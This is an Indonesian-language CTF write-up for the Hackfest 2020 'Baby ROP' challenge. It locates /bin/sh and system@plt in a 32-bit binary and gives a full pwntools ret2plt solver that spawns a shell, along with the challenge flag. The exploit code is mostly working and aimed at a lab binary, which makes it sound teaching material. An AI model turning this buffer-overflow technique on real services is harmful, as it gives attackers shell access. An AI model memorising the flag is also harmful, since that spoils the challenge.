# Baby ROP

simple ret2plt gengs

author: tripoloski

## Solusi

Cari offset untuk merubah nilai `eip`, binary ini menyimpan string `/bin/sh` yang artinya 
kita dapat memanfaatkannya untuk dijadikan parameter pertama untuk function `system()`
gunakan gdb untuk mencari alamat dari string `/bin/sh`

    gef➤  grep /bin/sh
    [+] Searching '/bin/sh' in memory
    [+] In '/home/tripoloski/code/ctf/hackfest-2020/quals/pwn/baby-rop/solver/baby-rop'(0x804c000-0x804d000), permission=rw-
    0x804c040 - 0x804c047  →   "/bin/sh" 
    [+] In '/usr/lib/i386-linux-gnu/libc-2.31.so'(0xf7f2b000-0xf7f9b000), permission=r--
    0xf7f45352 - 0xf7f45359  →   "/bin/sh" 
    gef➤  

terlihat `0x804c040` adalah alamat untuk string `/bin/sh`, selanjutnya cari alamat function 
`system()` dengan menggunakan perintah

    objdump -d -M intel baby-rop | grep system  

jalankan maka kita akan mendapat output seperti ini:

    080490b0 <system@plt>:
        8049211:       e8 9a fe ff ff          call   80490b0 <system@plt>

terlihat alamat `system()` adalah `0x080490b0` selanjutnya rancang payload seperti berikut dikarnakan binary ini adalah 
32bit

    p += p32(system_plt)
    p += "ALAN"
    p += p32(binsh)

berikut full solvernya:

    #!/usr/bin/env python2
    import sys
    from pwn import *
    context.update(arch="i386", endian="little", os="linux", log_level="debug",
                terminal=["tmux", "split-window", "-v", "-p 85"],)
    LOCAL, REMOTE = False, False
    TARGET=os.path.realpath("/home/tripoloski/code/ctf/hackfest-2020/quals/pwn/baby-rop/solver/baby-rop")
    elf = ELF(TARGET)

    def attach(r):
        if LOCAL:
            bkps = []
            gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
        return

    def exploit(r):
        attach(r)
        system_plt = 0x080490b0
        binsh = 0x804c040
        p = "A" * 98
        p += p32(system_plt)
        p += "ALAN"
        p += p32(binsh)
        r.sendline(p)
        r.interactive()
        return

    if __name__ == "__main__":
        if len(sys.argv)==2 and sys.argv[1]=="remote":
            REMOTE = True
            r = remote("127.0.0.1", 1337)
        else:
            LOCAL = True
            r = process([TARGET,])
        exploit(r)
        sys.exit(0)

FLAG: hackfest{simple_rop_guyzzzzzzz}